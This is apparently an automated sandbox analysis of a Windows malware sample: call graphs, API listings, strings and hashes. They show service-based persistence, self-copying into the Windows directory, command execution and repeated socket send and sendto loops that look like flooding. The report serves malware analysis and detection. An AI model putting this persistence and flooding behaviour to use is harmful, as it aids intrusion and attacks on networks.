1584->1585 1586 403150 1584->1586 1585->1481 1587 40326c 1586->1587 1600 4030fd CreateThread 1586->1600 1601 4030fd CreateThread 1587->1601 1591 40355a memset sprintf SHDeleteKeyA 1590->1591 1592 40352d OpenServiceA 1590->1592 1591->1499 1593 403555 CloseServiceHandle 1592->1593 1594 40354b DeleteService CloseServiceHandle 1592->1594 1593->1591 1594->1593 1596 404875 socket connect 1595->1596 1596->1517 1596->1518 1597->1576 1598->1573 1599->1580 1600->1586 1601->1585 1602 40588b LoadLibraryA 6CFC6DE0 1603 4058bd 1602->1603 1604 4058b3 1602->1604 1608 4058dd Sleep 1603->1608 1611 4058f5 1603->1611 1605 4058ba 1604->1605 1606 40593f Sleep 1604->1606 1605->1603 1607 405904 Sleep 1605->1607 1606->1611 1607->1611 1608->1611 1612 407470 6 API calls 1714 407440 1612->1714 1614 40756d socket 1682 407512 1614->1682 1615 406c10 3 API calls 1615->1682 1616 4078e2 RtlExitUserThread LoadLibraryA 6CFC6DE0 1617 407a2b 1616->1617 1618 40796f 1616->1618 1620 406bd0 2 API calls 1617->1620 1719 406c50 6 API calls 1618->1719 1621 407a31 1620->1621 1623 407a38 wsprintfA 1621->1623 1627 406bd0 2 API calls 1621->1627 1635 407a8a 1623->1635 1624 4079df 1628 407a23 RtlExitUserThread 1624->1628 1631 407a1d Sleep 1624->1631 1632 407a0d Sleep TerminateProcess 1624->1632 1626 40761b inet_addr 1626->1682 1627->1623 1628->1617 1629 407ae2 RtlExitUserThread LoadLibraryA 6CFC6DE0 1633 406c50 6 API calls 1629->1633 1630 406c10 3 API calls 1630->1635 1631->1624 1632->1631 1634 407b68 wsprintfA 1633->1634 1636 407bf7 1634->1636 1642 407bc9 1634->1642 1635->1629 1635->1630 1721 408680 socket 1635->1721 1639 407c21 Sleep TerminateProcess 1636->1639 1640 407c39 1636->1640 1638 407aad send 1643 407ad7 Sleep 1638->1643 1639->1640 1645 406bd0 2 API calls 1640->1645 1641 407d78 RtlExitUserThread LoadLibraryA 6CFC6DE0 LoadLibraryA 6CFC6DE0 1644 406c10 3 API calls 1641->1644 1642->1641 1646 406c10 3 API calls 1642->1646 1650 408680 4 API calls 1642->1650 1643->1635 1680 407e08 1644->1680 1647 407c3f 1645->1647 1646->1642 1648 407c9b 1647->1648 1649 407c4d 1647->1649 1653 407ca2 1648->1653 1654 407cdd 1648->1654 1651 407c52 wsprintfA 1649->1651 1652 407c76 wsprintfA 1649->1652 1655 407d48 send 1650->1655 1651->1642 1652->1642 1658 406bd0 2 API calls 1653->1658 1656 406bd0 2 API calls 1654->1656 1661 407d6e Sleep 1655->1661 1659 407ce2 1656->1659 1657 407e24 socket 1657->1680 1660 407ca7 1658->1660 1663 406bd0 2 API calls 1659->1663 1662 406bd0 2 API calls 1660->1662 1661->1642 1664 407cb5 wsprintfA 1662->1664 1665 407cf0 wsprintfA 1663->1665 1664->1642 1665->1642 1666 407ecb RtlExitUserThread LoadLibraryA 6CFC6DE0 1667 407f3e 1666->1667 1668 407f7f 1666->1668 1669 406bd0 2 API calls 1667->1669 1670 406bd0 2 API calls 1668->1670 1671 407f4a 1669->1671 1672 407f8c 1670->1672 1674 406bd0 2 API calls 1671->1674 1675 406bd0 2 API calls 1672->1675 1673 406bd0 LoadLibraryA 6CFC6DE0 1673->1680 1676 407f58 wsprintfA 1674->1676 1677 407f9a wsprintfA 1675->1677 1686 407fbf 1676->1686 1677->1686 1678 407e92 sendto 1679 407eb5 Sleep 1678->1679 1678->1680 1679->1680 1680->1657 1680->1666 1680->1673 1680->1678 1681 40801d RtlExitUserThread LoadLibraryA 6CFC6DE0 1683 40808e 1681->1683 1682->1614 1682->1615 1682->1616 1682->1626 1685 407882 sendto 1682->1685 1687 408124 RtlExitUserThread 1683->1687 1688 40809b wsprintfA wsprintfA 1683->1688 1684 406c10 3 API calls 1684->1686 1685->1682 1686->1681 1686->1684 1689 408680 4 API calls 1686->1689 1691 408130 1687->1691 1690 406c10 3 API calls 1688->1690 1692 407fef send 1689->1692 1693 4080e6 1690->1693 1694 40815a 14 API calls 1691->1694 1696 408017 Sleep 1692->1696 1695 408680 4 API calls 1693->1695 1700 408235 1694->1700 1697 4080ef send 1695->1697 1696->1686 1698 408117 Sleep 1697->1698 1698->1683 1699 408261 1700->1699 1701 4082f9 1700->1701 1702 4085da 1700->1702 1703 406c10 3 API calls 1701->1703 1726 4085fe 1702->1726 1705 408355 inet_ntoa inet_addr 1703->1705 1708 4083ab 1705->1708 1706 4085e6 1709 4083c6 htonl 1708->1709 1711 4083f9 1709->1711 1710 408441 RtlExitUserThread 1710->1711 1711->1710 1712 4084ad sprintf inet_ntoa inet_addr htonl 1711->1712 1713 40858f sendto 1711->1713 1712->1711 1713->1711 1715 407448 1714->1715 1716 40744b 1714->1716 1715->1682 1729 407350 lstrlen ??2@YAPAXI 1716->1729 1718 40746a 1718->1682 1720 406ca5 wsprintfA 1719->1720 1720->1624 1722 408697 1721->1722 1723 40869e htons connect 1721->1723 1722->1638 1724 4086d0 closesocket 1723->1724 1725 4086df 1723->1725 1724->1638 1725->1638 1727 408603 1726->1727 1728 40860a WSACleanup 1726->1728 1727->1728 1728->1706 1730 4073be 1729->1730 1730->1718 1731 4086f0 LoadLibraryA 6CFC6DE0 LoadLibraryA 6CFC6DE0 1732 40879a 1731->1732 1733 4087a3 1732->1733 1734 406c10 3 API calls 1732->1734 1735 4087d5 1734->1735 1736 406bd0 2 API calls 1735->1736 1737 408806 inet_addr 1736->1737 1738 406c10 3 API calls 1737->1738 1739 408835 1738->1739 1740 406bd0 2 API calls 1739->1740 1741 408845 1740->1741 1742 406bd0 2 API calls 1741->1742 1743 40886a htonl 1742->1743 1747 40888e 1743->1747 1744 408abe RtlExitUserThread LoadLibraryA 6CFC6DE0 LoadLibraryA 6CFC6DE0 1745 406c10 3 API calls 1744->1745 1781 408b59 1745->1781 1746 406bd0 LoadLibraryA 6CFC6DE0 1746->1747 1747->1744 1747->1746 1749 406bd0 2 API calls 1747->1749 1774 408a5c sendto 1747->1774 1748 408b89 1750 40898b wsprintfA 1749->1750 1752 406bd0 2 API calls 1750->1752 1751 408d18 RtlExitUserThread LoadLibraryA 6CFC6DE0 1764 408d5f 1751->1764 1753 4089af inet_addr 1752->1753 1756 406bd0 2 API calls 1753->1756 1754 408daf RtlExitUserThread LoadLibraryA 6CFC6DE0 LoadLibraryA 6CFC6DE0 1755 406c10 3 API calls 1754->1755 1757 408e30 socket 1755->1757 1758 4089d6 1756->1758 1762 408e72 1757->1762 1760 406bd0 2 API calls 1758->1760 1763 4089ec htonl 1760->1763 1761 406c10 LoadLibraryA 6CFC6DE0 inet_addr 1761->1764 1767 408ea8 RtlExitUserThread LoadLibraryA 6CFC6DE0 1762->1767 1769 408e86 sendto 1762->1769 1763->1747 1764->1754 1764->1761 1766 408680 socket htons connect closesocket 1764->1766 1770 408da6 Sleep 1764->1770 1765 408c23 wsprintfA 1768 408c47 inet_addr 1765->1768 1766->1764 1777 408f2e 1767->1777 1771 406c10 3 API calls 1768->1771 1769->1769 1772 408e9e Sleep 1769->1772 1770->1764 1771->1781 1772->1762 1773 408f80 RtlExitUserThread 1774->1747 1776 408ab1 Sleep 1774->1776 1775 406c10 3 API calls 1775->1777 1776->1747 1777->1773 1777->1775 1778 408680 4 API calls 1777->1778 1779 408f52 send 1778->1779 1780 408f7a Sleep 1779->1780 1780->1777 1781->1748 1781->1751 1781->1765 1782 408cd9 sendto 1781->1782 1782->1781 1783 408d09 Sleep 1782->1783 1783->1781 1784 408130 1802 408fb0 1784->1802 1786 40815a 14 API calls 1788 408235 1786->1788 1787 408261 1788->1787 1789 4082f9 1788->1789 1790 4085da 1788->1790 1791 406c10 3 API calls 1789->1791 1792 4085fe WSACleanup 1790->1792 1793 408355 inet_ntoa inet_addr 1791->1793 1794 4085e6 1792->1794 1796 4083ab 1793->1796 1797 4083c6 htonl 1796->1797 1800 4083f9 1797->1800 1798 408441 RtlExitUserThread 1798->1800 1799 4084ad sprintf inet_ntoa inet_addr htonl 1799->1800 1800->1798 1800->1799 1801 40858f sendto 1800->1801 1801->1800 1803 408fbc 1802->1803 1803->1786 1803->1803 1804 406db0 LoadLibraryA 6CFC6DE0 LoadLibraryA 6CFC6DE0 1805 406bd0 2 API calls 1804->1805 1806 406e06 1805->1806 1807 406bd0 2 API calls 1806->1807 1808 406e15 1807->1808 1809 406c10 3 API calls 1808->1809 1810 406e5d socket 1809->1810 1812 406e9f 1810->1812 1813 406edc 7 API calls 1812->1813 1815 406eb3 sendto 1812->1815 1814 406f58 1813->1814 1817 406c10 3 API calls 1814->1817 1815->1815 1816 406ecb Sleep 1815->1816 1816->1812 1816->1813 1818 406f8a socket connect 1817->1818 1819 406fb2 1818->1819 1820 406fc7 1818->1820 1821 406bd0 2 API calls 1820->1821 1822 406fd1 1821->1822 1823 406bd0 2 API calls 1822->1823 1824 406fe0 1823->1824 1825 407036 RtlExitUserThread 1824->1825 1826 40701e send Sleep 1824->1826 1828 408fb0 1825->1828 1826->1824 1829 40705a 6 API calls 1828->1829 1830 4070c0 1829->1830 1831 4070d9 1830->1831 1832 406c10 3 API calls 1830->1832 1833 4070f7 1832->1833 1834 406bd0 2 API calls 1833->1834 1835 407143 1834->1835 1836 406bd0 2 API calls 1835->1836 1839 407152 1836->1839 1837 4071aa RtlExitUserThread 1841 4071e5 1837->1841 1838 40718d sendto 1838->1838 1838->1839 1839->1837 1839->1838 1840 407214 RtlExitUserThread 1841->1840 1842 406c10 3 API calls 1841->1842 1843 408680 4 API calls 1841->1843 1842->1841 1844 407208 Sleep 1843->1844 1844->1841 1845 403114 Sleep 1846 402dd5 1858 402a59 WSAStartup 1846->1858 1849 402f96 gethostname 1851 402fc8 gethostbyname 1849->1851 1852 4030ed WSACleanup 1849->1852 1850 4030f8 1851->1852 1856 402fe2 1851->1856 1852->1850 1853 402ff3 memset memcpy 1854 403036 memset sprintf 1853->1854 1854->1856 1855 403093 Sleep 1855->1856 1856->1852 1856->1853 1856->1854 1856->1855 1860 402ad0 8 API calls 1856->1860 1859 402a7d 1858->1859 1859->1849 1859->1850 1861 402b56 sprintf 1860->1861 1862 402b69 sprintf 1860->1862 1861->1862 1863 402be2 1862->1863 1864 402d62 1863->1864 1886 402a92 GetModuleFileNameA 1863->1886 1864->1856 1866 402bf0 Sleep memset sprintf 1867 402c31 1866->1867 1887 402a92 GetModuleFileNameA 1867->1887 1869 402c3e 1870 402d68 GetLocalTime memset sprintf WinExec Sleep 1869->1870 1871 402c4a memset sprintf 1869->1871 1870->1864 1872 402c7b 1871->1872 1888 402a92 GetModuleFileNameA 1872->1888 1874 402c88 1874->1870 1875 402c94 memset sprintf 1874->1875 1876 402cc5 1875->1876 1889 402a92 GetModuleFileNameA 1876->1889 1878 402cd2 1878->1870 1879 402cde memset sprintf 1878->1879 1880 402d0f 1879->1880 1890 402a92 GetModuleFileNameA 1880->1890 1882 402d1c 1882->1870 1883 402d24 memset sprintf 1882->1883 1884 402d55 1883->1884 1891 402a92 GetModuleFileNameA 1884->1891 1886->1866 1887->1869 1888->1874 1889->1878 1890->1882 1891->1864 1892 402a37 1893 402a3c LoadLibraryA 6CFC6DE0 1892->1893 1894 406b9a _exit 1895 40407c 9 API calls 1941 404044 socket connect 1895->1941 1898 403492 2 API calls 1899 404127 memset 1898->1899 1900 406090 44 API calls 1899->1900 1901 404146 1900->1901 1944 4034e5 wsprintfA LoadLibraryA 1901->1944 1903 40414e memcpy send 1905 40463d 1903->1905 1926 4041c2 1903->1926 1906 40423d memset 1945 403758 1906->1945 1908 403758 3 API calls 1908->1926 1909 404654 OpenMutexA 1912 404675 1909->1912 1913 404667 ReleaseMutex CloseHandle 1909->1913 1910 4043c8 lstrcpyn 1916 403135 CreateThread 1910->1916 1911 404497 OpenMutexA 1919 4044aa ReleaseMutex CloseHandle 1911->1919 1911->1926 1915 40351a 5 API calls 1912->1915 1913->1912 1914 4045c4 GetTickCount wsprintfA 1923 4045f1 LoadLibraryA 6CFC6DE0 1914->1923 1920 40467b memset sprintf SHDeleteKeyA 1915->1920 1916->1926 1917 404347 lstrcpyn lstrlen lstrcpyn 1921 403280 CreateThread 1917->1921 1918 40442d GetDesktopWindow ShellExecuteA 1918->1906 1919->1926 1925 40474f 1920->1925 1921->1926 1922 4042d9 lstrcpyn lstrlen lstrcpyn 1924 403311 CreateThread 1922->1924 1927 40461a WinExec 1923->1927 1924->1926 1928 40355b 12 API calls 1925->1928 1926->1905 1926->1906 1926->1908 1926->1909 1926->1910 1926->1911 1926->1914 1926->1917 1926->1918 1926->1922 1931 406bd0 LoadLibraryA 6CFC6DE0 1926->1931 1932 406bd0 2 API calls 1926->1932 1935 40475b 1926->1935 1927->1906 1929 404754 ExitProcess 1928->1929 1931->1926 1933 404529 wsprintfA 1932->1933 1934 404553 LoadLibraryA 6CFC6DE0 1933->1934 1934->1926 1936 40351a 5 API calls 1935->1936 1937 404761 memset sprintf SHDeleteKeyA 1936->1937 1938 404835 1937->1938 1939 40355b 12 API calls 1938->1939 1940 40483a WinExec ExitProcess 1939->1940 1942 404075 1941->1942 1943 404069 closesocket 1941->1943 1942->1898 1942->1905 1943->1942 1944->1903 1946 403771 select 1945->1946 1947 40376c 1945->1947 1946->1947 1948 4037a3 1946->1948 1947->1926 1948->1946 1948->1947 1949 4037a7 __WSAFDIsSet 1948->1949 1949->1946 1950 4037ba recv 1949->1950 1950->1947 1950->1948 1951 40387c 8 API calls 1997 40336c LoadLibraryA 6CFC6DE0 LoadLibraryA 6CFC6DE0 1951->1997 1954 403e32 1955 403492 2 API calls 1956 40391c memset 1955->1956 1957 406090 44 API calls 1956->1957 1958 40393b 1957->1958 2005 4034e5 wsprintfA LoadLibraryA 1958->2005 1960 403943 memcpy send 1960->1954 1968 4039b7 1960->1968 1962 403a32 memset 2006 4036c6 1962->2006 1964 4036c6 3 API calls 1964->1968 1965 403e49 OpenMutexA 1966 403e6a 1965->1966 1967 403e5c ReleaseMutex CloseHandle 1965->1967 1971 40351a 5 API calls 1966->1971 1967->1966 1968->1954 1968->1962 1968->1964 1968->1965 1969 403bbd lstrcpyn 1968->1969 1970 403c8c OpenMutexA 1968->1970 1972 403db9 GetTickCount wsprintfA 1968->1972 1974 403b3c lstrcpyn lstrlen lstrcpyn 1968->1974 1975 403c22 GetDesktopWindow ShellExecuteA 1968->1975 1979 403ace lstrcpyn lstrlen lstrcpyn 1968->1979 1985 406bd0 LoadLibraryA 6CFC6DE0 1968->1985 1988 406bd0 2 API calls 1968->1988 1991 403f50 1968->1991 1973 403135 CreateThread 1969->1973 1970->1968 1976 403c9f ReleaseMutex CloseHandle 1970->1976 1977 403e70 memset sprintf SHDeleteKeyA 1971->1977 1981 403de6 LoadLibraryA 6CFC6DE0 1972->1981 1973->1968 1978 403280 CreateThread 1974->1978 1975->1962 1976->1968 1982 403f44 1977->1982 1978->1968 1980 403311 CreateThread 1979->1980 1980->1968 1984 403e0f WinExec 1981->1984 1983 40355b 12 API calls 1982->1983 1986 403f49 ExitProcess 1983->1986 1984->1962 1985->1968 1989 403d1e wsprintfA 1988->1989 1990 403d48 LoadLibraryA 6CFC6DE0 1989->1990 1990->1968 1992 40351a 5 API calls 1991->1992 1993 403f56 memset sprintf SHDeleteKeyA 1992->1993 1994 40402a 1993->1994 1995 40355b 12 API calls 1994->1995 1996 40402f WinExec ExitProcess 1995->1996 2012 4029ce 1997->2012 2000 4033f2 memset strcspn strncpy strcspn atoi 2001 403445 2000->2001 2002 406c10 3 API calls 2001->2002 2003 40345f socket connect 2002->2003 2004 403482 2003->2004 2004->1954 2004->1955 2005->1960 2007 4036da 2006->2007 2008 4036df select 2006->2008 2007->1968 2008->2007 2011 403711 2008->2011 2009 403715 __WSAFDIsSet 2009->2008 2010 403728 recv 2009->2010 2010->2007 2010->2011 2011->2007 2011->2008 2011->2009 2015 4027b0 strlen malloc 2012->2015 2014 4029e8 _mbscpy strstr 2014->2000 2014->2001 2017 4027ed 2015->2017 2016 402967 realloc 2018 40281c 2016->2018 2017->2016 2017->2018 2018->2014 2019 4055bc 6 API calls 2020 405610 Sleep 2019->2020 2022 405681 6 API calls 2020->2022 2023 405798 2022->2023 2024 4057b0 2023->2024 2029 4057a6 exit 2023->2029 2025 40580c WSAStartup CreateThread WSAStartup CreateThread 2024->2025 2038 405336 EnumResourceNamesA 2024->2038 2026 405846 2025->2026 2056 4030fd CreateThread 2026->2056 2029->2024 2030 4057c4 wsprintfA 2039 405348 8 API calls 2030->2039 2031 405851 WaitForSingleObject CloseHandle 2034 405874 Sleep 2031->2034 2034->2026 2036 4057ec 2036->2025 2037 4057f5 CreateThread Sleep 2036->2037 2037->2025 2038->2030 2040 40543f 2039->2040 2041 405472 memset 2040->2041 2042 4054d0 2040->2042 2043 4054c9 2041->2043 2055 4034e5 wsprintfA LoadLibraryA 2042->2055 2043->2042 2044 40550a GetFileSize 2043->2044 2045 405546 CloseHandle 2044->2045 2046 405519 GlobalAlloc 2044->2046 2045->2042 2046->2045 2047 405529 ReadFile 2046->2047 2048 405551 CloseHandle BeginUpdateResourceA 2047->2048 2049 40553d GlobalFree 2047->2049 2050 405569 UpdateResourceA 2048->2050 2051 4055ac GlobalFree 2048->2051 2049->2045 2052 405584 lstrlen UpdateResourceA 2050->2052 2053 40559b EndUpdateResourceA 2050->2053 2051->2042 2052->2053 2053->2051 2054 4055a9 2053->2054 2054->2051 2055->2036 2056->2031

                                Callgraph

                                • Executed
                                • Not Executed
                                • Opacity -> Relevance
                                • Disassembly available
                                callgraph 0 Function_00407440 13 Function_00407350 0->13 1 Function_00404044 2 Function_00405244 3 Function_00406BC4 4 Function_004036C6 5 Function_00406BC7 6 Function_00406A48 6->5 36 Function_0040597D 6->36 64 Function_00406BB2 6->64 7 Function_00405348 8 Function_004050CA 9 Function_0040604B 10 Function_0040604D 20 Function_0040355B 10->20 11 Function_004029CE 61 Function_004027B0 11->61 12 Function_0040484F 48 Function_00406C10 12->48 29 Function_00408FF0 13->29 14 Function_00406C50 15 Function_00406BD0 46 Function_00408F90 15->46 16 Function_00402AD0 51 Function_00402A92 16->51 17 Function_00402DD5 17->16 19 Function_00402A59 17->19 18 Function_00403758 21 Function_004069E0 22 Function_004051E3 38 Function_0040507D 22->38 57 Function_00405126 22->57 23 Function_004027E4 44 Function_0040298D 23->44 24 Function_004034E5 25 Function_00408FE5 26 Function_004067E9 27 Function_004037EA 28 Function_0040336C 28->11 28->48 30 Function_00407470 30->0 30->14 30->15 39 Function_004085FE 30->39 41 Function_00408680 30->41 30->46 30->48 55 Function_00408620 30->55 56 Function_00407220 30->56 62 Function_00408FB0 30->62 31 Function_004086F0 31->15 31->41 31->46 31->48 31->55 32 Function_004059F4 33 Function_004085FB 34 Function_0040407C 34->1 34->15 34->18 34->20 34->24 40 Function_00403280 34->40 47 Function_00406090 34->47 49 Function_00403311 34->49 50 Function_00403492 34->50 53 Function_0040351A 34->53 65 Function_00403135 34->65 35 Function_0040387C 35->4 35->15 35->20 35->24 35->28 35->40 35->47 35->49 35->50 35->53 35->65 36->20 36->32 45 Function_00405B10 36->45 37 Function_004030FD 40->37 42 Function_00405182 42->8 42->38 43 Function_0040588B 45->10 45->15 47->21 49->37 52 Function_00403114 54 Function_00406B9A 56->29 58 Function_004027A8 58->44 59 Function_004048AA 59->12 59->15 59->20 59->24 59->27 59->40 59->47 59->49 59->50 59->53 59->65 60 Function_00408130 60->39 60->46 60->48 60->55 60->62 61->44 63 Function_00406DB0 63->15 63->41 63->48 63->62 65->37 66 Function_00405336 67 Function_00402A37 68 Function_004055BC 68->7 68->24 68->37 68->66

                                Executed Functions

                                Function 0040597D Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 00405992
                                  • Part of subcall function 004059F4: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
                                  • Part of subcall function 004059F4: 6CFC6DE0.KERNEL32(00000000), ref: 00405A10
                                  • Part of subcall function 004059F4: _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
                                  • Part of subcall function 004059F4: _mbscat.MSVCRT ref: 00405AD7
                                  • Part of subcall function 004059F4: RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,?), ref: 00405AF6
                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 004059BB
                                • ExitProcess.KERNEL32 ref: 004059EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: CtrlDispatcherExitLibraryLoadOpenProcessServiceStartStartup_mbscat_mbscpy
                                • String ID: Defghi Klmnopqr Tuv$Defghi Klmnopqr Tuvwxyab Defg$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq
                                • API String ID: 2992414417-1370363722
                                • Opcode ID: 83e1352e72bf4f9bd4512c402b146e2ee333a0580aff940d61e14a20f462f08e
                                • Instruction ID: 2c600e66c56aa54e41322d3d423351a33ef688bbf1abba83ec879d044cf264d1
                                • Opcode Fuzzy Hash: 83e1352e72bf4f9bd4512c402b146e2ee333a0580aff940d61e14a20f462f08e
                                • Instruction Fuzzy Hash: E8F090B0950209BBDB10BB919C0E7AE76B8EB0430AF40403AE501B00E2DBB85648CF6E
                                Function 00405B10 Relevance: 101.8, APIs: 40, Strings: 18, Instructions: 346librarystringregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405B47
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405B50
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenSCManagerA), ref: 00405B5E
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405B61
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenServiceA), ref: 00405B6F
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405B72
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,CloseServiceHandle), ref: 00405B80
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405B83
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA), ref: 00405B95
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405B98
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegSetValueExA), ref: 00405BA6
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405BA9
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,StartServiceA), ref: 00405BB7
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405BBA
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyA), ref: 00405BC8
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405BCB
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,UnlockServiceDatabase), ref: 00405BD9
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405BDC
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,ChangeServiceConfig2A), ref: 00405BEA
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405BED
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,CreateServiceA), ref: 00405BFB
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405BFE
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,LockServiceDatabase), ref: 00405C09
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405C0C
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00405C24
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00405C32
                                • strlen.MSVCRT ref: 00405C3F
                                • strncmp.MSVCRT ref: 00405C53
                                • wsprintfA.USER32 ref: 00405CB5
                                • _mbscat.MSVCRT ref: 00405CC7
                                • _mbscat.MSVCRT ref: 00405CDA
                                • memset.MSVCRT ref: 00405D00
                                • _mbscpy.MSVCRT(?,?,?,00000000,00000104), ref: 00405D13
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00405D45
                                • ChangeServiceConfig2A.ADVAPI32(?,00000001,Defghijk Mnopqrstu Wxyabcd Fghijklm Opq), ref: 00405DA9
                                • GetLastError.KERNEL32 ref: 00405E3E
                                  • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00403CEF,0000001A), ref: 00406BDB
                                  • Part of subcall function 00406BD0: 6CFC6DE0.KERNEL32(00000000), ref: 00406BE2
                                • _mbscpy.MSVCRT(?,SYSTEM\CurrentControlSet\Services\), ref: 00405F8E
                                • _mbscat.MSVCRT ref: 00405F9D
                                • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00405FB8
                                • lstrlen.KERNEL32(004059DB), ref: 00406014
                                  • Part of subcall function 0040604D: RegCloseKey.KERNEL32(?,0040603C), ref: 00406083
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$_mbscat$Open_mbscpy$ChangeCloseConfig2DirectoryErrorFileLastManagerModuleNameServiceWindowslstrlenmemsetstrlenstrncmpwsprintf
                                • String ID: %c%c%c%c%c%c.exe$ADVAPI32.dll$ChangeServiceConfig2A$CloseServiceHandle$CopyFileA$CreateServiceA$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq$Description$KERNEL32.dll$LockServiceDatabase$OpenSCManagerA$OpenServiceA$RegCloseKey$RegOpenKeyA$RegSetValueExA$SYSTEM\CurrentControlSet\Services\$StartServiceA$UnlockServiceDatabase
                                • API String ID: 397004274-766656692
                                • Opcode ID: 4b3913a236ff868ac2d24959da058726aa9527939866c3b61e1db7a2032d7c53
                                • Instruction ID: cb804ed11c5d1b7d2f4ad966b6bff0d4186705c14a699b97b59b11ec4e5a602e
                                • Opcode Fuzzy Hash: 4b3913a236ff868ac2d24959da058726aa9527939866c3b61e1db7a2032d7c53
                                • Instruction Fuzzy Hash: BCE168B1C0426CABDB229B65CC49BDEBEBCAF15744F0440EAE10CB6191C7B95B848F65
                                Function 004059F4 Relevance: 75.3, APIs: 5, Strings: 38, Instructions: 84registrylibraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 32 4059f4-405afe LoadLibraryA 6CFC6DE0 _mbscpy _mbscat RegOpenKeyExA 33 405b00-405b08 32->33 34 405b0a 32->34 35 405b0c-405b0f 33->35 34->35
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405A10
                                • _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
                                • _mbscat.MSVCRT ref: 00405AD7
                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,?), ref: 00405AF6
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadOpen_mbscat_mbscpy
                                • String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$M$RegCloseKey$S$S$S$S$SYSTEM\CurrentControlSet\Services\$T$Y$\$\$\$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$t$t$t$u$v
                                • API String ID: 3494547092-1712674794
                                • Opcode ID: 144e551ac243e5fd7547a2f692bcd48759d7fa28a844e17c41491cb02200368e
                                • Instruction ID: 35d77256bc8034983bafe4ceb320269e5385723e05cff16902321712d41d725d
                                • Opcode Fuzzy Hash: 144e551ac243e5fd7547a2f692bcd48759d7fa28a844e17c41491cb02200368e
                                • Instruction Fuzzy Hash: EA410F11D0C2C9E9EB12D2A8C9097DEBFB54B16749F0840D9D2847A2D2C2FE575887B6
